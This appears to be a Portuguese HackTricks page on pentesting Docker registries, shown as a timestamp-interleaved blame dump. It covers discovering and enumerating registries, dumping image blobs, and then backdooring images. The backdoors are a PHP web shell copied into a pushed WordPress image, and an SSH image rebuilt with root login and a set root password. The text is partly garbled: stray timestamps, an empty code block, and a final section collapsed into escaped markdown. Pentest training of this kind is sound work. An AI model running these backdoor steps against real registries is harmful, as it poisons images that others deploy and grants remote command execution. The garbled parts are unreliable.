2024-04-06 19:38:49 +00:00
# 5000 - Pentesting Docker Registry
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 22:28:10 +00:00
< summary > < strong > Aprenda hacking na AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 22:28:10 +00:00
Outras maneiras de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-03-26 09:10:28 +00:00
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2024-02-08 22:28:10 +00:00
* Adquira o [**swag oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-04-06 19:38:49 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-02-08 22:28:10 +00:00
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repositórios do github.
2022-04-28 16:01:33 +00:00
< / details >
2024-01-05 23:03:45 +00:00
## Informações Básicas
2021-01-03 00:43:09 +00:00
2024-03-26 09:10:28 +00:00
Um sistema de armazenamento e distribuição conhecido como **registro Docker** está em vigor para imagens Docker que são nomeadas e podem ter várias versões, diferenciadas por tags. Essas imagens são organizadas dentro de **repositórios Docker** no registro, cada repositório armazenando várias versões de uma imagem específica. A funcionalidade fornecida permite que as imagens sejam baixadas localmente ou enviadas para o registro, desde que o usuário tenha as permissões necessárias.
2021-01-03 00:43:09 +00:00
2024-03-26 09:10:28 +00:00
**DockerHub** serve como o registro público padrão para o Docker, mas os usuários também têm a opção de operar uma versão local do registro/distribuição Docker de código aberto ou optar pelo **Docker Trusted Registry** com suporte comercial. Além disso, vários outros registros públicos podem ser encontrados online.
2021-01-03 00:43:09 +00:00
2024-02-08 22:28:10 +00:00
Para baixar uma imagem de um registro local, o seguinte comando é usado:
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
```bash
2021-01-03 00:43:09 +00:00
docker pull my-registry:9000/foo/bar:2.1
```
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
Este comando busca a imagem `foo/bar` na versão `2.1` no registro localizado no domínio `my-registry` na porta `9000` . Por outro lado, para baixar a mesma imagem do DockerHub, especialmente se `2.1` for a versão mais recente, o comando simplifica para:
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
```bash
2021-01-03 00:43:09 +00:00
docker pull foo/bar
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Porta padrão:** 5000
2024-04-06 19:38:49 +00:00
2021-10-18 11:21:18 +00:00
```
2021-01-03 00:43:09 +00:00
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
## Descoberta
2021-01-03 00:43:09 +00:00
2024-02-08 22:28:10 +00:00
A maneira mais fácil de descobrir este serviço em execução é obtê-lo na saída do nmap. De qualquer forma, observe que, como é um serviço baseado em HTTP, ele pode estar atrás de proxies HTTP e o nmap não o detectará. Algumas impressões digitais:
2021-01-03 00:43:09 +00:00
2024-04-06 19:38:49 +00:00
* Se você acessar `/` , nada será retornado na resposta
* Se você acessar `/v2/` , então `{}` é retornado
* Se você acessar `/v2/_catalog` , você pode obter:
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
2021-01-03 00:43:09 +00:00
2023-06-06 18:56:34 +00:00
## Enumeração
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
### HTTP/HTTPS
2021-01-03 00:43:09 +00:00
2024-02-08 22:28:10 +00:00
O registro do Docker pode ser configurado para usar **HTTP** ou **HTTPS** . Portanto, a primeira coisa que você pode precisar fazer é **descobrir qual** está sendo configurado:
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
curl -s http://10.10.10.10:5000/v2/_catalog
#If HTTPS
2024-01-05 23:03:45 +00:00
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
2021-01-03 00:43:09 +00:00
Warning: < FILE > " to save to a file.
#If HTTP
{"repositories":["alpine","ubuntu"]}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
### Autenticação
2021-01-03 00:43:09 +00:00
2024-02-08 22:28:10 +00:00
O registro do Docker também pode ser configurado para exigir **autenticação** :
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}
```
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
Se o Docker Registry estiver exigindo autenticação, você pode [**tentar fazer força bruta usando isso** ](../generic-methodologies-and-resources/brute-force.md#docker-registry ).\
**Se encontrar credenciais válidas, você precisará usá-las** para enumerar o registro, no `curl` você pode usá-las assim:
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
### Enumeração usando DockerRegistryGrabber
2021-01-03 00:43:09 +00:00
2024-03-26 09:10:28 +00:00
[DockerRegistryGrabber ](https://github.com/Syzik/DockerRegistryGrabber ) é uma ferramenta em Python para enumerar / extrair registros do Docker (sem autenticação ou com autenticação básica)
2024-04-06 19:38:49 +00:00
2021-12-13 00:07:45 +00:00
```bash
2024-03-26 09:10:28 +00:00
usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header] [--list | --dump_all | --dump DOCKERNAME] url
____ ____ ____
| _ \ | _ \ / ___|
| | | || |_) || | _
| |_| || _ < | |_ | |
|____/ |_| \_\ \____|
Docker Registry grabber tool v2
by @SyzikSecu
positional arguments:
url URL
options:
-h, --help show this help message and exit
-p port port to use (default : 5000)
Authentication:
-U USERNAME Username
-P PASSWORD Password
-A header Authorization bearer token
Actions:
--list
--dump_all
--dump DOCKERNAME DockerName
Example commands:
python drg.py http://127.0.0.1 --list
python drg.py http://127.0.0.1 --dump my-ubuntu
python drg.py http://127.0.0.1 --dump_all
python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --list
python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --dump my-ubuntu
python drg.py https://127.0.0.1 -U 'testuser' -P 'testpassword' --dump_all
python drg.py https://127.0.0.1 -A '< Auth BEARER TOKEN > ' --list
python drg.py https://127.0.0.1 -A '< Auth BEARER TOKEN > ' --dump my-ubuntu
python drg.py https://127.0.0.1 -A '< Auth BEARER TOKEN > ' --dump_all
2021-12-13 00:07:45 +00:00
python3 DockerGraber.py http://127.0.0.1 --list
[+] my-ubuntu
[+] my-ubuntu2
2024-03-26 09:10:28 +00:00
python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu
2021-12-13 00:07:45 +00:00
[+] blobSum found 5
[+] Dumping my-ubuntu
2024-01-05 23:03:45 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
2024-03-26 09:10:28 +00:00
python3 DockerGraber.py http://127.0.0.1 --dump_all
[+] my-ubuntu
[+] my-ubuntu2
2021-12-13 00:07:45 +00:00
[+] blobSum found 5
2024-03-26 09:10:28 +00:00
[+] Dumping my-ubuntu
2024-01-05 23:03:45 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
2021-12-13 00:07:45 +00:00
[+] blobSum found 5
2024-03-26 09:10:28 +00:00
[+] Dumping my-ubuntu2
2024-01-05 23:03:45 +00:00
[+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
[+] Downloading : b39e2761d3d4971e78914857af4c6bd9989873b53426cf2fef3e76983b166fa2
[+] Downloading : c8ee6ca703b866ac2b74b6129d2db331936292f899e8e3a794474fdf81343605
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
2021-12-13 00:07:45 +00:00
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
### Enumeração usando curl
2021-12-13 00:07:45 +00:00
2024-02-08 22:28:10 +00:00
Uma vez que **obteve acesso ao registro do docker** , aqui estão alguns comandos que você pode usar para enumerá-lo:
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
{"repositories":["alpine","ubuntu"]}
#Get tags of a repository
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}
#Get manifests
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest
{
2024-01-05 23:03:45 +00:00
"schemaVersion": 1,
"name": "ubuntu",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
},
{
"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
}
],
"signatures": [
{
"header": {
"jwk": {
"crv": "P-256",
"kid": "DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX",
"kty": "EC",
"x": "leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg",
"y": "Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"
},
"alg": "ES256"
},
"signature": "GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q",
"protected": "eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"
}
]
2021-01-03 00:43:09 +00:00
}
#Download one of the previously listed blobs
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
#Inspect the insides of each blob
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
```
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
{% hint style="warning" %}
2024-02-08 22:28:10 +00:00
Note que ao baixar e descompactar os arquivos blobs, pastas e arquivos aparecerão no diretório atual. **Se você baixar todos os blobs e descompactá-los na mesma pasta, eles irão sobrescrever os valores dos blobs previamente descompactados** , então tenha cuidado. Pode ser interessante descompactar cada blob em uma pasta diferente para inspecionar o conteúdo exato de cada blob.
2021-01-03 00:43:09 +00:00
{% endhint %}
2023-06-06 18:56:34 +00:00
### Enumeração usando docker
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu
#Check the commands used to create the layers of the image
docker history 10.10.10.10:5000/ubuntu
#IMAGE CREATED CREATED BY SIZE COMMENT
2024-01-05 23:03:45 +00:00
#ed05bef01522 2 years ago ./run.sh 46.8MB
#<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B
#<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B
#<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B
#<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB
2021-01-03 00:43:09 +00:00
#Run and get a shell
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container
```
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
### Inserindo backdoor na imagem do WordPress
2021-01-03 00:43:09 +00:00
2024-02-09 12:48:36 +00:00
No cenário em que você encontrou um Registro Docker salvando uma imagem do WordPress, você pode inserir um backdoor.\
2023-06-06 18:56:34 +00:00
**Crie** o **backdoor** :
2021-01-03 00:43:09 +00:00
{% code title="shell.php" %}
```bash
<?php echo shell_exec($_GET["cmd"]); ?>
```
2024-02-08 22:28:10 +00:00
{% endcode %}
2023-06-06 18:56:34 +00:00
Crie um **Dockerfile** :
2021-01-03 00:43:09 +00:00
{% code title="Dockerfile" %}
2024-04-06 19:38:49 +00:00
```
```
{% endcode %}
2021-01-03 00:43:09 +00:00
```bash
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
```
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
**Criar** a nova imagem, **verificar** se foi criada e **enviá-la** :
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
2021-12-13 00:07:45 +00:00
docker build -t 10.10.10.10:5000/wordpress .
2024-01-05 23:03:45 +00:00
#Create
2021-01-03 00:43:09 +00:00
docker images
docker push registry:5000/wordpress #Push it
```
2024-04-06 19:38:49 +00:00
2024-02-08 22:28:10 +00:00
### Instalando um backdoor no servidor SSH image
2021-01-03 00:43:09 +00:00
2024-03-26 09:10:28 +00:00
Suponha que você encontrou um Registro Docker com uma imagem SSH e deseja instalar um backdoor nele.\
2024-02-08 22:28:10 +00:00
**Baixe** a imagem e **execute** :
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
Extrair o arquivo `sshd_config` da imagem SSH:
2024-04-06 19:38:49 +00:00
2021-01-03 00:43:09 +00:00
```bash
docker cp 4c989242c714:/etc/ssh/sshd_config .
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
E modifique para definir: `PermitRootLogin yes`
2021-01-03 00:43:09 +00:00
2023-06-06 18:56:34 +00:00
Crie um **Dockerfile** como o seguinte:
2021-01-03 00:43:09 +00:00
2024-04-06 19:38:49 +00:00
\`\`\`bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd\_config /etc/ssh/ RUN echo root:password | chpasswd \`\`\` \*\*Criar\*\* a nova imagem, \*\*verificar\*\* se foi criada e \*\*enviar\*\*: \`\`\`bash docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create docker images docker push registry:5000/sshd-docker-cli #Push it \`\`\` ## Referências \* \[https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/]\(https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/)
2024-02-08 22:28:10 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 22:28:10 +00:00
< summary > < strong > Aprenda hacking AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 22:28:10 +00:00
Outras maneiras de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-03-26 09:10:28 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2024-02-08 22:28:10 +00:00
* Adquira o [**swag oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-04-06 19:38:49 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-03-26 09:10:28 +00:00
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >